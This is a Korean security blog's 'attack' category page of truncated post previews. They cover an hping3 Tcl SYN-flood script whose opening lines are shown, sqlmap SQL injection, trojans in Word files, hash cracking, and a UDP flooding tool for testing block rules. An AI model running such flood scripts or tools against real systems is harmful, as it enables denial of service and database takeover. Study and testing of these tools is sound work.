본문 바로가기

attack10

SYN flood attack -- hping network security tool SYN flood -- synflood.htcl # (c) GPL2 fluxist(at)gmail.com # Usage; hping3 exec ./synflood.htcl if {$argc < 2} { puts "Required arguments: hostname dstport" exit 1 } foreach {hostname port} $argv break set srcport 14000 set target [hping resolve $hostname] set myaddr [hping outifa $target] puts "Synflooding $target..." while {1} { hping send "ip(saddr=$myaddr,daddr=$target)+tcp(sport=$srcport,dp.. 2011. 5. 4.
SQL injection PT tool - sqlmap 0.9 (update) “sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying fi.. 2011. 4. 12.
EXEs in word docs Today, our friends at Trend Micro blogged about a new attack vector using Microsoft Word documents. We saw this as well last week, and have written a detection for the dropped trojan. It’s not just a “lawsuit” that’s being spammed, we also picked up another form of this attack in our honeypots over the weekend: When you open the Word document, you see a “PDF”, but it’s actually not. It’s a JPG, .. 2010. 3. 31.
PasswordsPro - 해시(Hash) 암호화 크랙 Important! Using this software for purposes other than recovering your own lost passwords violates License Agreement and may violate the Law! Program Description This program is designated for the recovery of passwords for different types of hashes. The program currently supports about 30 types of hashes, and new ones can be easily added by creating a custom external hashing DLL-module. The actu.. 2010. 1. 15.
UDP Flooder 툴 활용 DDoS 공격 네트워크 장비 또는 서버를 구축 후 차단에 대한 룰을 적용한 후 간단히 UDP Flood Attack 차단에 대한 결과를 확인하기에 쓸만한 툴이 있다. NetTool 또는 UDP Flooder 등과 같은 것을 이용하면 간단하면서도 손쉽게 테스트 할 수 있다. 아래는 UDP Flooder Tool 을 활용하여 UDP Flooding Attack 를 시도해 보는 과정이다. 첨부된 프로그램을 다운받아서 실행하면 위와 같은 화면이 나오게 된다. (단, 다른 목적이 아닌 테스트 용도로 사용하기를 권장한다. 무리한 목적으로 사용시 문제의 소지가 있으니 주의!) 패킷 목적지 대상의 IP 또는 호스트 주소와 포트번호를 기입한다. 원하는 특정 포트로 전송이 가능하다. 그리고 스피드는 패킷의 전송 속도를 지정할 수 있다... 2009. 7. 29.
728x90